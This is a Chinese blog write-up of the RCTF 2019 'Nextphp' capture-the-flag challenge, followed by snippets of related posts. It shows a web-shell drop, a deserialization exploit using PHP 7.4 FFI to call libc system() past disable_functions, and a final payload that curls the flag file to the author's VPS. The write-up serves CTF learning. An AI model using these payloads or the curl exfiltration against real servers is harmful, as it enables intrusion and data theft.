[RCTF 2019]Nextphp

已于 2022-01-22 10:40:00 修改
阅读量1.4k 收藏 2
点赞数 1
分类专栏: CTF刷题记录 文章标签: php Web CTF FFI
于 2022-01-22 10:26:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/120319633
版权

[RCTF 2019]Nextphp

知识点:php7.4的FFI扩展安全问题以及利用

文章目录


打开容器 

<?php
if (isset($_GET['a'])) {
    eval($_GET['a']);
} else {
    show_source(__FILE__);
}

查看phpinfo(),查看disable_functions,过滤了相当多的函数

set_time_limit,ini_set,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,putenv,error_log,dl

首先尝试蚁剑直接连接,但是失败了,然后使用file_put_contents函数写入a.php文件,里面写个一句话木马,密码为1,然后连接,成功

image-20220118224929142

可以得到preload.php的源码

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    //可以进行函数执行
    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        //array_merge把两个数组合并为一个数组
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        
        $this->data = unserialize($payload);
        $this->run();
    }
	//结果输出
    public function __get ($key) {
        //如果$key为ret,就可以输出函数执行返回的结果
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        throw new \Exception('No implemented');
    }
}

关于PHP FFI的学习

学习文章:PHP FFI详解 - 一种全新的PHP扩展方式 - 风雪之隅 (laruence.com)

FFI是什么?

FFI是php7.4出的一个扩展,提供了高级语言直接的相互调用,相对于PHP来说,FFI可以让我们方便的调用C语言写的各种库

调用方法的对比

其实现有大量的PHP扩展是对一些已有的C库的包装,比如常用的mysqli, curl, gettext等,PECL中也有大量的类似扩展。

传统的方式,当我们需要用一些已有的C语言的库的能力的时候,我们需要用C语言写wrapper,把他们包装成扩展,这个过程中就需要大家去学习PHP的扩展怎么写,当然现在也有一些方便的方式,比如Zephir. 但总还是有一些学习成本的,而有了FFI以后,我们就可以直接在PHP脚本中调用C语言写的库中的函数了。

FFI可以让我们更加方便的调用C语言积累的大量的优秀的库,享受这个庞大的资源

使用FFI需要启用PHP7.4配置中的ext/ffi,需要注意的是PHP-FFI要求libffi-3以上

PHPFFI的安全性问题

FFI虽然给了我们很大的灵活性,但是毕竟直接调用C库函数,还是非常具有风险性的,我们应该只容许用户调用我们确认过的函数,于是,ffi.enable=preload就该上场了,当我们设置ffi.enable=preload的话,那就只有在opcache.preload的脚本中的函数才能调用FFI,而用户写的函数是没有办法直接调用的。

解决方法:

可以通过ffi.enable=preload, 我们就可以限制,所有的FFI API只能被我们可控制的preload脚本调用,用户不能直接调用。从而我们可以在这些函数内做好尽可能的安全保证工作,从而保证一定的安全性。

关于payload的理解

问了下师傅,得到了如下的理解

如果我们要调用C标准库里面的system函数(先不考虑PHP自己实现了system函数),我们就使用cdef去加载,cdef会把存放system函数功能的动态链接库libc加载到内存里面,这样PHP的进程空间里就有了这个system,这也是disable_functions里面过滤了system函数,但是结果的payload里面仍然还使用了system的原因,因为我们是加载c库函数中的system函数的

动态链接库里面有符号表,函数名称表,存储着函数名称对应的函数机器码地址。当cdef的参数写上函数原型之后,他就可以通过这个方式找到动态链接库里面对应的函数地址:cdef的第一个参数函数原型告诉他这个函数叫啥名字,参数列表,返回值类型,这样他就会按照一定的命名规范将其转化为system在libc库里面的符号并以此进行查找

exp

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int system(char *command);'
    ];

    //可以进行函数执行
    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        //array_merge把两个数组合并为一个数组
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {

        $this->data = unserialize($payload);
        $this->run();
    }
    //结果输出
    public function __get ($key) {
        //如果$key为ret,就可以输出函数执行返回的结果
        return $this->data[$key];
    }
/*
    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }
    public function __construct () {
        throw new \Exception('No implemented');
    }*/
}

$a = new A();
echo serialize($a);

注意要注释__serialize()函数,然后因为根据分析,我们应该调用的是serialize函数,但是php7.4中新增了一些内容,所以我们需要进行注释

image-20220122093310344

在不注释的情况下

会去执行__serialize()函数

image-20220122102029712

最后的结果

image-20220122094102006

在注释了__serialize()的情况下,会去执行serialize()函数

image-20220122094040547

对比一下,这两个是不同的

执行的过程:

传入$a之后,进行unserialize反序列化,然后因为php7.4的更新,会找__unserialize()函数,然后执行run()函数,然后data['ret']=FFI::cdef('int system(char *command);'),然后使用从C库中加载的system函数

最后的payload

?a=$a=unserialize('C:1:"A":89:{a:3:{s:3:"ret";N;s:4:"func";s:9:"FFI::cdef";s:3:"arg";s:26:"int system(char *command);";}}')->__serialize()['ret']->system('curl -d @/flag vps的ip:7777');

得到flag

image-20220122093922045

本地环境复现

windows下似乎不能复现了

Can it run on Windows? · Issue #15 · dstogov/php-ffi (github.com)

image-20220121002101894

那在linux下进行复现,复现环境根据文章:RCTF2019Web题解之nextphp | Mochazz’s blog

image-20220121234816043

中间经过一系列操作,注意一些环境的配置,比如

autoconf的安装:error: Autoconf version 2.68 or higher is required on CentOS – How to Fix | Lampdocs.com

环境配好之后,去/root/myphp/bin目录下,进行操作。如下,成功的调用了system函数

image-20220121235059371

然后加载libc.so.6查看当前用户

image-20220122091244839

参考链接

  1. RCTF2019Web题解之nextphp | Mochazz’s blog
  2. [刷题RCTF 2019]Nextphp - kar3a - 博客园 (cnblogs.com)
  3. PHP FFI详解 - 一种全新的PHP扩展方式 - 风雪之隅 (laruence.com)
  4. [RCTF 2019]Nextphp_fmyyy1的博客-CSDN博客
  5. error: Autoconf version 2.68 or higher is required on CentOS – How to Fix | Lampdocs.com
  6. PHP: 魔术方法 - Manual
Sk1y
关注
专栏目录
[wp] RCTF2019-nextphp
MercyLin的博客
09-11 1807
<?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 尝试利用eval ?a=echo system("ls"); system()函数被禁止了. 尝试查看phpinfo(); ?a=phpinfo(); 查看成功,在页面查找disable_function...
RCTF2019-WEB-nextphp
river
05-31 1812
RCTF-web-nextphp <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } http://192.168.1.8/?a=var_dump(scandir(getcwd())); http://192.168.1.8/?a=show_so...
[RCTF 2019]Nextphpphp7.4的FFI扩展安全问题)
m0_62422842的博客
12-14 682
这个FFI扩展最初是为了能够更方便的调用C语言的各种库而设计的,然而在不正确的使用下就会像该题这样,直接绕过php层的限制去执行命令。当然,个人觉得该扩展引发的安全问题也是比较好防护的。设置ffi.enable=preload参数选项,指定特定的php文件去调用FFI。总之,FFI扩展引发的问题也是需要了解的。
[RCTF 2019]Nextphp题解
blue_lotus_first的博客
09-21 1203
[RCTF 2019]NextPHP题解
BUUCTF [RCTF2019]babyre1
weixin_53349587的博客
01-01 926
1.先分析一下大致的流程: 1)输入flag,先进行长度判断,是不是16位 2)sub_562AB8800C00函数:判断输入的flag是否为16进制数 3)sub_562AB8801180函数:xxtea解密(无填充模式),密钥是unk_562AB8A02010 4)sub_562AB88013D0函数:CRC16校验,具体可以参考CRC校验码简介及CRC16的计算方法 - 21ic电子网 5)最后将解密后的数据与0x17异或,最终得到"Bingo!" 2.分析具体的解密过程 1)先
[RCTF2019]disk
qq_51447967的博客
04-28 506
题目分析 首先原题是有提示的 An otaku used VeraCrypt to encrypt his favorites. Password: rctf Flag format: rctf{a-zA-Z0-9_} 下载得到一个vmdk文件,看起来是虚拟机的磁盘文件。 VMDK:(VMWare Virtual Machine Disk Format)是虚拟机VMware创建的虚拟硬盘格式,文件存在于VMware文件系统中,被称为VMFS(虚拟机文件系统) 然后用txt格式打开后搜索CTF得到如下
[RCTF 2019]nextphp
最新发布
rev1ve的博客
11-08 868
官方文档在php版本7.4或更高的版本中将和添加到类中,而无需考虑兼容性文档中给出了实例作者指出这种形式的代码无法可靠运行,因为嵌套的 serialize() 和 unserialize() 调用是以不同顺序执行的因为在序列化过程中,首先执行 A::serialize() 中的 serialize() 调用,然后执行 B::serialize() 中的 serialize() 调用。
php算法刷题网站,刷题[RCTF 2019]Nextphp
weixin_42364392的博客
04-14 304
解题思路打开发现,???,这么简单嘛,直接一句话写shellfile_put_contents('1.php','');蚁剑连接,???,就这?好吧,只有当前目录的权限,看preload.php,看着是反序列化了我懒,不想看序列化,不过感觉是都被禁了,没啥用bypass_diasble_function1.LD_PRELOADmail,putenv,error_log全被禁了,打扰了2.**Apa...
[RCTF 2019]Nextphp&&php预加载实现FFI
Je3Z的博客
09-12 427
参考 <?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 初看题目很简单,然后看了下phpinfo 过滤了挺多函数的,命令执行的都过滤了,然后还有open_basedir限制/var/www/html 然后可能会想一些绕过disable_function的姿势 1.LD_PRELOAD mail,putenv,error_log全被禁了 2.Apache Mod CGI
PHP next() 函数
冷月醉雪的博客
01-26 406
  参考: https://www.yuque.com/docs/share/68ca87e7-5b96-4040-b02c-b841ef757dca    
rctf
zhang14916的博客
05-24 564
baby-crtpto: 阅读源码发现程序首先要求我们输入username和password,然后对cookie“admin:0;username:%s;password:%s"做aes-cbc加密,然后计算sha1(key+cookie),最后将AES-cbc的iv,密文和sha1的值连接在一起返回给我们。要求我们输入相同形式的字符串,并要求cookie中存在"admin"="1"且验证sha...
RCTF-RCalc WP
qq_41252520的博客
07-28 629
保护 分析 IDA分析代码,部分函数名经过我的分析已被重置 这部分函数主要就是申请了两个,我称之为calc的结构,并给该结构中的buf成员申请空间。 这个函数很明显存在栈溢出,值得注意的是scanf("%s",v1)是以空格作为输入结束的标志,并且作者刻意实现了自定义的canary保护。在一开始随机一个数,存放在answer中,在尾部又从前面申请的calc结构中取出来进行对比 ...
RCTF-2015 nobug
doudoudedi
06-07 696
思路 有一个格式化字符串的漏洞 int sub_8048B32() { int v0; // eax const char *v1; // eax v0 = strlen(s); v1 = sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, v1); } 题目没有开nx我们可以直接布置好shellcode然后跳过去观察栈发现一个地方可以利用 .text:08048BD7 sub
RCTF-misc-coocat wp
qq_53755216的博客
09-15 559
coolcat writeup I am honored to give a misc challenge for RCTF( forgive me for my poor english plz The challenge comes from an article
RCTF-2015——welpwn
05-11 326
64位程序 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char buf; // [rsp+0h] [rbp-400h] 4 5 write(1, "Welcome to RCTF\n", 0x10uLL); 6 fflush(_...
RCTF2020_nowrite(libc_start_main的妙用+盲注)
seaaseesa的博客
06-11 1461
RCTF2020_nowrite(libc_start_main的妙用+盲注) 首先,检查一下程序的保护机制 检测一下沙箱,发现仅能进行open、read、exit操作,write操作都不行。 然后,我们用IDA分析一下,是一个及其简短的栈溢出程序 程序中没有输出,并且write也禁用了,也没有open函数,execve也禁用了,FULL RELRO也不能进行ret2dl,那么本题只能进行盲注,我们还需要构造出一个open系统调用。但是几乎没有可用的地方可以给我们构造。 找到一条有用的
PHP7.4 FFI 扩展安全问题
weixin_63231007的博客
02-22 1874
PHP 7.4 FFI扩展 bypass disable_function&[RCTF] nextphp&geek2020 FighterFightsInvincibly
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值